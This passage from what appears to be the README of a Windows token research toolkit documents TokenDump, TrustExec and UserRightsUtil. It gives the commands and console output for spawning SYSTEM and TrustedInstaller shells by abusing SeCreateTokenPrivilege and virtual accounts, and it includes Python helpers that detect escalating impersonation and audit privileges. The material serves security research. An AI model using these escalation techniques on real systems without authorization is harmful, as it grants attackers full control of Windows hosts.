NT AUTHORITY\LogonSessionId_0_124092 GenericExecute, GenericRead None AccessAllowed
[*] Done.
If you pass a handle value in a specific process as the -v option and the PID as the -p option together with the -s flag, the tool gets verbose information for that handle as follows:
C:\Dev>.\TokenDump.exe -s -p 8828 -v 0x428 -d
[>] Trying to enable SeDebugPrivilege.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to dump token handle information.
[Token Information for Handle 0x428 of svchost.exe (PID: 8828)]
Token User : NT AUTHORITY\LOCAL SERVICE (SID: S-1-5-19)
Token Owner : NT AUTHORITY\LOCAL SERVICE (SID: S-1-5-19)
Primary Group : NT AUTHORITY\LOCAL SERVICE (SID: S-1-5-19)
Token Type : Impersonation
Impersonation Level : Impersonation
Token ID : 0x000000000119F79B
Authentication ID : 0x00000000000003E5
Original ID : 0x00000000000003E7
Modified ID : 0x000000000119F79D
Integrity Level : System
Session ID : 0
Elevation Type : Default
Elevated : True
Restricted : False
AppContainer : False
Has Linked Token : False
Token Source : Advapi
Token Source ID : 0x000000000006C1EC
PRIVILEGES INFORMATION
----------------------
Privilege Name State
======================= =========================
SeChangeNotifyPrivilege EnabledByDefault, Enabled
SeImpersonatePrivilege EnabledByDefault, Enabled
GROUP INFORMATION
-----------------
Group Name Attributes
====================================== ====================================================
Mandatory Label\System Mandatory Level Integrity, IntegrityEnabled
Everyone Mandatory, EnabledByDefault, Enabled
BUILTIN\Users Mandatory, EnabledByDefault, Enabled
NT AUTHORITY\SERVICE Mandatory, EnabledByDefault, Enabled
CONSOLE LOGON Mandatory, EnabledByDefault, Enabled
NT AUTHORITY\Authenticated Users Mandatory, EnabledByDefault, Enabled
NT AUTHORITY\This Organization Mandatory, EnabledByDefault, Enabled
NT SERVICE\LicenseManager EnabledByDefault, Enabled, Owner
NT AUTHORITY\LogonSessionId_0_442859 Mandatory, EnabledByDefault, Enabled, Owner, LogonId
LOCAL Mandatory, EnabledByDefault, Enabled
DACL INFORMATION
----------------
Account Name Access Flags Type
========================= =========== ===== =============
NT AUTHORITY\SYSTEM GenericAll None AccessAllowed
OWNER RIGHTS ReadControl None AccessAllowed
NT SERVICE\LicenseManager GenericAll None AccessAllowed
[*] Done.
To investigate the impersonation token applied to a thread, pass the thread ID as the -t option as follows:
C:\Dev>.\TokenDump.exe -e -T -d
[>] Trying to enable SeDebugPrivilege.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to enumerate thread tokens.
PID TID Process Name Token User Integrity Impersonation Level
==== ==== ================= =================== ========= ===================
2052 6768 svchost.exe NT AUTHORITY\SYSTEM System Impersonation
3416 2068 svchost.exe NT AUTHORITY\SYSTEM System Impersonation
3416 4168 svchost.exe NT AUTHORITY\SYSTEM System Impersonation
2864 8696 TokenStealing.exe NT AUTHORITY\SYSTEM System Impersonation
4936 4848 TiWorker.exe NT AUTHORITY\SYSTEM System Impersonation
[+] Got 5 handle(s).
[*] Found 1 account(s).
[*] NT AUTHORITY\SYSTEM
[*] Done.
C:\Dev>.\TokenDump.exe -s -p 4936 -t 4848 -d
[>] Trying to enable SeDebugPrivilege.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to dump thread token information.
[Token Information for TiWorker.exe (PID: 4936, TID: 4848)]
Token User : NT AUTHORITY\SYSTEM (SID: S-1-5-18)
Token Owner : NT AUTHORITY\SYSTEM (SID: S-1-5-18)
Primary Group : NT AUTHORITY\SYSTEM (SID: S-1-5-18)
Token Type : Impersonation
Impersonation Level : Impersonation
Token ID : 0x00000000010C7342
Authentication ID : 0x00000000000003E7
Original ID : 0x00000000000003E7
Modified ID : 0x0000000000F9368D
Integrity Level : System
Session ID : 0
Elevation Type : Default
Elevated : True
Restricted : False
AppContainer : False
Has Linked Token : False
Token Source : N/A
Token Source ID : N/A
PRIVILEGES INFORMATION
----------------------
Privilege Name State
========================================= =========================
SeAssignPrimaryTokenPrivilege Disabled
SeLockMemoryPrivilege EnabledByDefault, Enabled
SeIncreaseQuotaPrivilege Disabled
SeTcbPrivilege EnabledByDefault, Enabled
SeSecurityPrivilege Enabled
SeTakeOwnershipPrivilege Disabled
SeLoadDriverPrivilege Disabled
SeSystemProfilePrivilege EnabledByDefault, Enabled
SeSystemtimePrivilege Disabled
SeProfileSingleProcessPrivilege EnabledByDefault, Enabled
SeIncreaseBasePriorityPrivilege EnabledByDefault, Enabled
SeCreatePagefilePrivilege EnabledByDefault, Enabled
SeCreatePermanentPrivilege EnabledByDefault, Enabled
SeBackupPrivilege Enabled
SeRestorePrivilege Enabled
SeShutdownPrivilege Disabled
SeDebugPrivilege EnabledByDefault, Enabled
SeAuditPrivilege EnabledByDefault, Enabled
SeSystemEnvironmentPrivilege Disabled
SeChangeNotifyPrivilege EnabledByDefault, Enabled
SeUndockPrivilege Disabled
SeManageVolumePrivilege Disabled
SeImpersonatePrivilege EnabledByDefault, Enabled
SeCreateGlobalPrivilege EnabledByDefault, Enabled
SeIncreaseWorkingSetPrivilege EnabledByDefault, Enabled
SeTimeZonePrivilege EnabledByDefault, Enabled
SeCreateSymbolicLinkPrivilege EnabledByDefault, Enabled
SeDelegateSessionUserImpersonatePrivilege EnabledByDefault, Enabled
GROUP INFORMATION
-----------------
Group Name Attributes
====================================== ====================================================
Mandatory Label\System Mandatory Level Integrity, IntegrityEnabled
Everyone Mandatory, EnabledByDefault, Enabled
BUILTIN\Users Mandatory, EnabledByDefault, Enabled
NT AUTHORITY\SERVICE Mandatory, EnabledByDefault, Enabled
CONSOLE LOGON Mandatory, EnabledByDefault, Enabled
NT AUTHORITY\Authenticated Users Mandatory, EnabledByDefault, Enabled
NT AUTHORITY\This Organization Mandatory, EnabledByDefault, Enabled
NT SERVICE\TrustedInstaller EnabledByDefault, Enabled, Owner
NT AUTHORITY\LogonSessionId_0_14288153 Mandatory, EnabledByDefault, Enabled, Owner, LogonId
LOCAL Mandatory, EnabledByDefault, Enabled
BUILTIN\Administrators EnabledByDefault, Enabled, Owner
DACL INFORMATION
----------------
Account Name Access Flags Type
=========================== =========== ===== =============
NT AUTHORITY\SYSTEM GenericAll None AccessAllowed
OWNER RIGHTS ReadControl None AccessAllowed
NT SERVICE\TrustedInstaller GenericAll None AccessAllowed
[*] Done.
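The `-e` and `-e -T` listings above are most useful side by side: a thread token is only interesting relative to the primary token of the process it lives in. The following Python is an added example, not TokenDump's code: it parses both tables as the tool prints them and flags threads whose impersonation token sits at a higher integrity level than the owning process's primary token (a SYSTEM token on a thread of a Medium-integrity user process, as the TokenStealing.exe row above shows), which is the case to follow up with `TokenDump.exe -s -p <PID> -t <TID>`. The sample text is constructed from the README's output; the TokenStealing.exe process row and the svchost.exe thread row (TID 7100) are invented so the cross-check has something to compare, and the heuristic is this example's own, not the tool's.

```python
"""Cross-check TokenDump -e and -e -T output (added example, not TokenDump code).

Flags threads whose impersonation token out-ranks the primary token of the
process that owns them. Service processes impersonating a lower-integrity
client are normal and stay quiet; a user process holding a SYSTEM
impersonation token is reported.
"""
import re
from collections import namedtuple

ProcessToken = namedtuple("ProcessToken", "pid name user integrity restricted appcontainer")
ThreadToken = namedtuple("ThreadToken", "pid tid name user integrity impersonation")

INTEGRITY_RANK = {name: i for i, name in enumerate(["Untrusted", "Low", "Medium", "High", "System"])}
_LEVEL = r"(Untrusted|Low|Medium|High|System)"
# Token User may contain spaces (NT AUTHORITY\LOCAL SERVICE), so it is matched lazily
# up to the fixed trailing columns. Process names are taken as one token (foo.exe).
_PROCESS_ROW = re.compile(r"^\s*(\d+)\s+(\S+)\s+(.+?)\s+" + _LEVEL + r"\s+(True|False)\s+(True|False)\s*$")
_THREAD_ROW = re.compile(r"^\s*(\d+)\s+(\d+)\s+(\S+)\s+(.+?)\s+" + _LEVEL +
                         r"\s+(Anonymous|Identification|Impersonation|Delegation)\s*$")

# Constructed sample modelled on the README's `TokenDump.exe -e` output.
# The TokenStealing.exe row is invented for the cross-check.
SAMPLE_PROCESS_OUTPUT = r"""
[>] Trying to enumerate process token.
PID  Process Name       Token User                   Integrity Restricted AppContainer
==== ================== ============================ ========= ========== ============
3016 sihost.exe         X64DEV\user                  Medium    False      False
860  fontdrvhost.exe    Font Driver Host\UMFD-0      Low       False      True
428  msedgewebview2.exe X64DEV\user                  Low       True       False
2588 svchost.exe        NT AUTHORITY\LOCAL SERVICE   System    False      False
6552 TokenStealing.exe  X64DEV\user                  Medium    False      False
[+] Got 5 token information.
"""

# Constructed sample modelled on `TokenDump.exe -e -T`; the svchost.exe row (TID 7100)
# is invented to show a service impersonating a lower-integrity client.
SAMPLE_THREAD_OUTPUT = r"""
[>] Trying to enumerate thread tokens.
PID  TID  Process Name      Token User          Integrity Impersonation Level
==== ==== ================= =================== ========= ===================
6552 5668 TokenStealing.exe NT AUTHORITY\SYSTEM System    Impersonation
2588 7100 svchost.exe       X64DEV\user         Medium    Impersonation
[+] Got 2 handle(s).
"""


def parse_process_tokens(text):
    """Rows of the process-token table; header, ruler and status lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = _PROCESS_ROW.match(line)
        if m:
            pid, name, user, level, restricted, appcontainer = m.groups()
            rows.append(ProcessToken(int(pid), name, user, level,
                                     restricted == "True", appcontainer == "True"))
    return rows


def parse_thread_tokens(text):
    """Rows of the thread-token table."""
    rows = []
    for line in text.splitlines():
        m = _THREAD_ROW.match(line)
        if m:
            pid, tid, name, user, level, imp = m.groups()
            rows.append(ThreadToken(int(pid), int(tid), name, user, level, imp))
    return rows


def find_escalating_impersonation(processes, threads):
    """Heuristic (this example's own): report threads at Impersonation or Delegation
    level whose token integrity exceeds the process token's, plus threads whose
    process is missing from the process table (nothing to compare against)."""
    by_pid = {p.pid: p for p in processes}
    findings = []
    for t in threads:
        if t.impersonation not in ("Impersonation", "Delegation"):
            continue
        proc = by_pid.get(t.pid)
        if proc is None:
            findings.append((t, "process not present in process table"))
        elif INTEGRITY_RANK[t.integrity] > INTEGRITY_RANK[proc.integrity]:
            findings.append((t, f"process token is {proc.user} at {proc.integrity}"))
    return findings


def report(process_text, thread_text):
    """One line per finding, ready to paste into a ticket."""
    findings = find_escalating_impersonation(parse_process_tokens(process_text),
                                             parse_thread_tokens(thread_text))
    return [f"{t.name} PID {t.pid} TID {t.tid}: {t.user} ({t.integrity}, {t.impersonation}); {why}"
            for t, why in findings]


if __name__ == "__main__":
    for line in report(SAMPLE_PROCESS_OUTPUT, SAMPLE_THREAD_OUTPUT):
        print(line)
```

Run TokenDump with -d before capturing, as the README shows, or processes the tool could not open will be missing from the process table and show up only as "not present" findings.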
TrustExec
This tool executes a process as the NT SERVICE\TrustedInstaller group account.
The original PoC is Grzegorz Tworek's TrustedInstallerCmd2.c.
I ported it to C# and rebuilt it as a tool.
Most operations require administrative privileges (SeDebugPrivilege, SeImpersonatePrivilege and High Mandatory Level):
C:\dev>TrustExec.exe
TrustExec - Tool to investigate TrustedInstaller capability.
Usage: TrustExec.exe [Options]
-h, --help : Displays this help message.
-m, --module : Specifies module name.
Available Modules:
+ exec - Run process as "NT SERVICE\TrustedInstaller".
+ sid - Add or remove virtual account's SID.
[*] To see help for each modules, specify "-m <Module> -h" as arguments.
exec Module
This module executes a process as the TrustedInstaller group account:
C:\dev>TrustExec.exe -m exec -h
TrustExec - Help for "exec" command.
Usage: TrustExec.exe -m exec [Options]
-h, --help : Displays this help message.
-s, --shell : Flag for interactive shell.
-f, --full : Flag to enable all available privileges.
-t, --technique : Specifies technique ID. Default ID is 0.
-c, --command : Specifies command to execute.
-d, --domain : Specifies domain name to add. Default value is "DefaultDomain".
-u, --username : Specifies username to add. Default value is "DefaultUser".
-i, --id : Specifies RID for virtual domain. Default value is "110".
-e, --extra : Specifies extra group SID(s) to add.
Available Technique IDs:
+ 0 - Leverages SeCreateTokenPrivilege. Uses only --shell flag, --full flag and --command option.
+ 1 - Leverages virtual logon. This technique creates virtual domain and account as a side effect.
For this module, 2 techniques are implemented. The technique is selected with the -t option.
If you set 0, or don't set a value for the -t option, TrustExec will try to create the TrustedInstaller process with the create token technique.
To get an interactive shell, set the -s flag.
C:\dev>TrustExec.exe -m exec -s
[>] Trying to get SYSTEM.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to impersonate as smss.exe.
[+] SeCreateTokenPrivilege is enabled successfully.
[+] SeAssignPrimaryTokenPrivilege is enabled successfully.
[>] Trying to impersonate thread token.
|-> Current Thread ID : 3360
[+] Impersonation is successful.
[>] Trying to create an elevated primary token.
[+] An elevated primary token is created successfully.
[>] Trying to create a token assigned process.
Microsoft Windows [Version 10.0.19043.1526]
(c) Microsoft Corporation. All rights reserved.
C:\dev>whoami /user
USER INFORMATION
----------------
User Name SID
=================== ========
nt authority\system S-1-5-18
C:\dev>whoami /groups | findstr /i trusted
NT SERVICE\TrustedInstaller Well-known group S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464 Enabled by default, Enabled group, Group owner
C:\dev>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= =======
SeAssignPrimaryTokenPrivilege Replace a process level token Enabled
SeTcbPrivilege Act as part of the operating system Enabled
SeDebugPrivilege Debug programs Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
To add an extra group account to the token of the new process, use the -e option as follows:
C:\dev>TrustExec.exe -m exec -s -e S-1-5-20
[>] Parsing group SID(s).
[+] "NT AUTHORITY\NETWORK SERVICE" is added as an extra group.
|-> SID : S-1-5-20
|-> Type : SidTypeWellKnownGroup
[>] Trying to get SYSTEM.
[>] Trying to impersonate as smss.exe.
[+] SeCreateTokenPrivilege is enabled successfully.
[+] SeAssignPrimaryTokenPrivilege is enabled successfully.
[>] Trying to impersonate thread token.
|-> Current Thread ID : 4392
[+] Impersonation is successful.
[>] Trying to create an elevated primary token.
[+] An elevated primary token is created successfully.
[>] Trying to create a token assigned process.
Microsoft Windows [Version 10.0.22000.318]
(c) Microsoft Corporation. All rights reserved.
C:\dev>whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ ============================================================== ==================================================
BUILTIN\Administrators Alias S-1-5-32-544 Enabled by default, Enabled group, Group owner
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
Mandatory Label\System Mandatory Level Label S-1-16-16384
NT SERVICE\TrustedInstaller Well-known group S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464 Enabled by default, Enabled group, Group owner
NT AUTHORITY\NETWORK SERVICE Well-known group S-1-5-20 Mandatory group, Enabled by default, Enabled group
To add multiple groups, specify the SIDs as a comma-separated list:
C:\dev>TrustExec.exe -m exec -s -e S-1-5-20,S-1-5-32-551
[>] Parsing group SID(s).
[+] "NT AUTHORITY\NETWORK SERVICE" is added as an extra group.
|-> SID : S-1-5-20
|-> Type : SidTypeWellKnownGroup
[+] "BUILTIN\Backup Operators" is added as an extra group.
|-> SID : S-1-5-32-551
|-> Type : SidTypeAlias
[>] Trying to get SYSTEM.
[>] Trying to impersonate as smss.exe.
[+] SeCreateTokenPrivilege is enabled successfully.
[+] SeAssignPrimaryTokenPrivilege is enabled successfully.
[>] Trying to impersonate thread token.
|-> Current Thread ID : 3104
[+] Impersonation is successful.
[>] Trying to create an elevated primary token.
[+] An elevated primary token is created successfully.
[>] Trying to create a token assigned process.
Microsoft Windows [Version 10.0.22000.318]
(c) Microsoft Corporation. All rights reserved.
C:\dev>whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ ============================================================== ==================================================
BUILTIN\Administrators Alias S-1-5-32-544 Enabled by default, Enabled group, Group owner
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
Mandatory Label\System Mandatory Level Label S-1-16-16384
NT SERVICE\TrustedInstaller Well-known group S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464 Enabled by default, Enabled group, Group owner
NT AUTHORITY\NETWORK SERVICE Well-known group S-1-5-20 Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators Alias S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
If you set 1 for the -t option, TrustExec will try to create the TrustedInstaller process with the virtual account technique.
As a side effect, this technique creates a virtual account that is used to impersonate the TrustedInstaller group account.
If you don't specify a domain name (-d option), username (-u option) and RID (-i option), this module creates the virtual account DefaultDomain\DefaultUser.
The default SID for the domain is S-1-5-110 and for the user is S-1-5-110-110:
C:\dev>TrustExec.exe -m exec -s -t 1
[>] Trying to get SYSTEM.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to impersonate as smss.exe.
[+] SeAssignPrimaryTokenPrivilege is enabled successfully.
[+] SeIncreaseQuotaPrivilege is enabled successfully.
[>] Trying to impersonate thread token.
|-> Current Thread ID : 2616
[+] Impersonation is successful.
[>] Trying to generate token group information.
[>] Trying to add virtual domain and user.
|-> Domain : DefaultDomain (SID : S-1-5-110)
|-> Username : DefaultUser (SID : S-1-5-110-110)
[+] Added virtual domain and user.
[>] Trying to logon as DefaultDomain\DefaultUser.
[>] Trying to create a token assigned process.
Microsoft Windows [Version 10.0.18362.30]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\dev>whoami /user
USER INFORMATION
----------------
User Name SID
========================= =============
defaultdomain\defaultuser S-1-5-110-110
C:\dev>whoami /groups | findstr /i trusted
NT SERVICE\TrustedInstaller Well-known group S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464 Enabled by default, Enabled group, Group owner
C:\dev>exit
[>] Exit.
[!] Added virtual domain and user are not removed automatically.
|-> To remove added virtual user SID : TrustExec.exe -m sid -r -d DefaultDomain -u DefaultUser
|-> To remove added virtual domain SID : TrustExec.exe -m sid -r -d DefaultDomain
To change the domain name and username, use the `-d` option and the `-u` option.
To change the domain RID, use the `-i` option as follows:
C:\dev>TrustExec.exe -m exec -s -d VirtualDomain -u VirtualAdmin -i 92 -t 1
[>] Trying to get SYSTEM.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to impersonate as smss.exe.
[+] SeAssignPrimaryTokenPrivilege is enabled successfully.
[+] SeIncreaseQuotaPrivilege is enabled successfully.
[>] Trying to impersonate thread token.
|-> Current Thread ID : 3612
[+] Impersonation is successful.
[>] Trying to generate token group information.
[>] Trying to add virtual domain and user.
|-> Domain : VirtualDomain (SID : S-1-5-92)
|-> Username : VirtualAdmin (SID : S-1-5-92-110)
[+] Added virtual domain and user.
[>] Trying to logon as VirtualDomain\VirtualAdmin.
[>] Trying to create a token assigned process.
Microsoft Windows [Version 10.0.18362.30]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\dev>whoami /user
USER INFORMATION
----------------
User Name SID
========================== ============
virtualdomain\virtualadmin S-1-5-92-110
If you want to execute a single command, use the `-c` option without the `-s` flag as follows:
C:\dev>TrustExec.exe -m exec -c "whoami /user & whoami /priv"
[>] Trying to get SYSTEM.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to impersonate as smss.exe.
[+] SeCreateTokenPrivilege is enabled successfully.
[+] SeAssignPrimaryTokenPrivilege is enabled successfully.
[>] Trying to impersonate thread token.
|-> Current Thread ID : 1464
[+] Impersonation is successful.
[>] Trying to create an elevated primary token.
[+] An elevated primary token is created successfully.
[>] Trying to create a token assigned process.
USER INFORMATION
----------------
User Name SID
=================== ========
nt authority\system S-1-5-18
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= =======
SeAssignPrimaryTokenPrivilege Replace a process level token Enabled
SeTcbPrivilege Act as part of the operating system Enabled
SeDebugPrivilege Debug programs Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
[>] Exit.
If you want to enable all available privileges, set the `-f` flag as follows:
C:\dev>TrustExec.exe -m exec -c "whoami /priv" -f
[>] Trying to get SYSTEM.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to impersonate as smss.exe.
[+] SeCreateTokenPrivilege is enabled successfully.
[+] SeAssignPrimaryTokenPrivilege is enabled successfully.
[>] Trying to impersonate thread token.
|-> Current Thread ID : 2526
[+] Impersonation is successful.
[>] Trying to create an elevated primary token.
[+] An elevated primary token is created successfully.
[>] Trying to create a token assigned process.
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== =======
SeCreateTokenPrivilege Create a token object Enabled
SeAssignPrimaryTokenPrivilege Replace a process level token Enabled
SeLockMemoryPrivilege Lock pages in memory Enabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeMachineAccountPrivilege Add workstations to domain Enabled
SeTcbPrivilege Act as part of the operating system Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeCreatePermanentPrivilege Create permanent shared objects Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeAuditPrivilege Generate security audits Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeSyncAgentPrivilege Synchronize directory service data Enabled
SeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeTrustedCredManAccessPrivilege Access Credential Manager as a trusted caller Enabled
SeRelabelPrivilege Modify an object label Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
[>] Exit.
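As an added example (not code from PrivFu), the following Python reads `whoami /priv` output like the listings above and reports which enabled privileges are, on their own, enough to reach SYSTEM, i.e. the set the PoCs in this repository abuse. The sample listing is constructed from the output shown above, not captured from a machine.

```python
import re

# Constructed sample modelled on the `whoami /priv` listing above
# (a TrustExec -c "whoami /priv" run without -f), not captured output.
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= =======
SeAssignPrimaryTokenPrivilege Replace a process level token             Enabled
SeTcbPrivilege                Act as part of the operating system       Enabled
SeDebugPrivilege              Debug programs                            Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Disabled
"""

# Privileges that by themselves allow escalation to SYSTEM; this is the set
# the KernelWritePoCs and TrustExec sections of this README rely on.
SYSTEM_EQUIVALENT = {
    "SeCreateTokenPrivilege", "SeAssignPrimaryTokenPrivilege", "SeTcbPrivilege",
    "SeDebugPrivilege", "SeImpersonatePrivilege", "SeRestorePrivilege",
    "SeTakeOwnershipPrivilege",
}

# One table row: name, free-text description, then Enabled/Disabled.
_ROW = re.compile(r"^(Se\w+Privilege)\s+(.+?)\s+(Enabled|Disabled)\s*$")


def parse_whoami_priv(text):
    """Return {privilege name: (description, enabled?)} from whoami /priv output."""
    privs = {}
    for line in text.splitlines():
        m = _ROW.match(line.strip())
        if m:
            name, desc, state = m.groups()
            privs[name] = (desc, state == "Enabled")
    return privs


def system_equivalent_enabled(privs):
    """Sorted names of enabled privileges that are sufficient to reach SYSTEM."""
    return sorted(
        name for name, (_, enabled) in privs.items()
        if enabled and name in SYSTEM_EQUIVALENT
    )


if __name__ == "__main__":
    found = parse_whoami_priv(SAMPLE_WHOAMI_PRIV)
    for name in system_equivalent_enabled(found):
        print(f"[!] {name} is enabled: {found[name][0]}")
```

Pipe real `whoami /priv` output into `parse_whoami_priv` to audit the token of any shell you are handed; a disabled privilege is still listed, since it can be re-enabled by the holder.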
The domain and username added by the virtual account technique are not removed automatically.
If you want to remove them, run the `sid` module as shown in the last output.
sid Module
This module is to manage virtual accounts created by this tool:
C:\dev>TrustExec.exe -m sid -h
TrustExec - Help for "sid" command.
Usage: TrustExec.exe -m sid [Options]
-h, --help : Displays this help message.
-a, --add : Flag to add virtual account's SID.
-r, --remove : Flag to remove virtual account's SID.
-d, --domain : Specifies domain name to add or remove. Default value is null.
-u, --username : Specifies username to add or remove. Default value is null.
-i, --id : Specifies RID for virtual domain to add. Default value is "110".
-s, --sid : Specifies SID to lookup.
-l, --lookup : Flag to lookup SID or account name in local system.
To look up a SID, set the `-l` flag. If you want to look up the domain or username from a SID, specify the SID with the `-s` option as follows:
C:\dev>TrustExec.exe -m sid -l -s S-1-5-18
[*] Result:
|-> Account Name : nt authority\system
|-> SID : S-1-5-18
|-> Account Type : SidTypeWellKnownGroup
If you want to look up the SID from a domain name, specify the domain name with the `-d` option as follows:
C:\dev>TrustExec.exe -m sid -l -d contoso
[*] Result:
|-> Account Name : contoso
|-> SID : S-1-5-21-3654360273-254804765-2004310818
|-> Account Type : SidTypeDomain
If you want to look up the SID from a domain name and username, specify the domain name with the `-d` option and the username with the `-u` option as follows:
C:\dev>TrustExec.exe -m sid -l -d contoso -u david
[*] Result:
|-> Account Name : contoso\david
|-> SID : S-1-5-21-3654360273-254804765-2004310818-1104
|-> Account Type : SidTypeUser
To remove a virtual account, set the `-r` flag.
The domain name to remove is specified with the `-d` option, and the username with the `-u` option:
C:\dev>TrustExec.exe -m sid -r -d defaultdomain -u defaultuser
[>] Trying to get SYSTEM.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to impersonate as smss.exe.
[+] SeAssignPrimaryTokenPrivilege is enabled successfully.
[+] SeIncreaseQuotaPrivilege is enabled successfully.
[>] Trying to impersonate thread token.
|-> Current Thread ID : 2568
[+] Impersonation is successful.
[>] Trying to remove SID.
|-> Domain : defaultdomain
|-> Username : defaultuser
[*] SID : S-1-5-110-110.
[+] Requested SID is removed successfully.
C:\dev>TrustExec.exe -m sid -r -d defaultdomain
[>] Trying to get SYSTEM.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to impersonate as smss.exe.
[+] SeAssignPrimaryTokenPrivilege is enabled successfully.
[+] SeIncreaseQuotaPrivilege is enabled successfully.
[>] Trying to impersonate thread token.
|-> Current Thread ID : 4696
[+] Impersonation is successful.
[>] Trying to remove SID.
|-> Domain : defaultdomain
[*] SID : S-1-5-110.
[+] Requested SID is removed successfully.
WARNING: Deleted SIDs may appear to remain until the OS is rebooted.
If you want to add a domain or user SID, set the `-a` flag as follows:
C:\dev>TrustExec.exe -m sid -a -d virtualworld -u virtualadmin -i 97
[>] Trying to get SYSTEM.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to impersonate as smss.exe.
[+] SeAssignPrimaryTokenPrivilege is enabled successfully.
[+] SeIncreaseQuotaPrivilege is enabled successfully.
[>] Trying to impersonate thread token.
|-> Current Thread ID : 3628
[+] Impersonation is successful.
[>] Trying to add virtual domain and user.
|-> Domain : virtualworld (SID : S-1-5-97)
|-> Username : virtualadmin (SID : S-1-5-97-110)
[+] Added virtual domain and user.
C:\dev>TrustExec.exe -m sid -l -s S-1-5-97
[*] Result : virtualworld (SID : S-1-5-97)
C:\dev>TrustExec.exe -m sid -l -s S-1-5-97-110
[*] Result : virtualworld\virtualadmin (SID : S-1-5-97-110)
UserRightsUtil
This tool is to manage user rights without `secpol.msc`.
Commands other than `lookup` require administrator privileges:
C:\dev>UserRightsUtil.exe
UserRightsUtil - User rights management utility.
Usage: UserRightsUtil.exe [Options]
-h, --help : Displays this help message.
-m, --module : Specifies module name.
Available Modules:
+ enum - Enumerate user rights for specific account.
+ find - Find accounts have a specific user right.
+ lookup - Lookup account's SID.
+ manage - Grant or revoke user rights.
[*] To see help for each modules, specify "-m <Module> -h" as arguments.
[!] -m option is required.
enum Module
To enumerate the user rights for a specific account, use the `enum` command with the `-u` and `-d` options, or with the `-s` option, as follows:
C:\dev>UserRightsUtil.exe -m enum -d contoso -u jeff
[>] Trying to enumerate user rights.
|-> Username : CONTOSO\jeff
|-> SID : S-1-5-21-3654360273-254804765-2004310818-1105
[+] Got 7 user right(s).
|-> SeChangeNotifyPrivilege
|-> SeIncreaseWorkingSetPrivilege
|-> SeShutdownPrivilege
|-> SeUndockPrivilege
|-> SeTimeZonePrivilege
|-> SeInteractiveLogonRight
|-> SeNetworkLogonRight
[*] Done.
C:\dev>UserRightsUtil.exe -m enum -s S-1-5-21-3654360273-254804765-2004310818-1105
[>] Trying to enumerate user rights.
|-> Username : CONTOSO\jeff
|-> SID : S-1-5-21-3654360273-254804765-2004310818-1105
[+] Got 7 user right(s).
|-> SeChangeNotifyPrivilege
|-> SeIncreaseWorkingSetPrivilege
|-> SeShutdownPrivilege
|-> SeUndockPrivilege
|-> SeTimeZonePrivilege
|-> SeInteractiveLogonRight
|-> SeNetworkLogonRight
[*] Done.
If you don't specify a domain name with the `-d` option, the local computer name is used as the domain name:
C:\dev>hostname
CL01
C:\dev>UserRightsUtil.exe -m enum -u guest
[>] Trying to enumerate user rights.
|-> Username : CL01\Guest
|-> SID : S-1-5-21-2659926013-4203293582-4033841475-501
[+] Got 3 user right(s).
|-> SeInteractiveLogonRight
|-> SeDenyInteractiveLogonRight
|-> SeDenyNetworkLogonRight
[*] Done.
find Module
This command is to find users who have a specific right.
For example, if you want to find users that have `SeDebugPrivilege`, execute as follows:
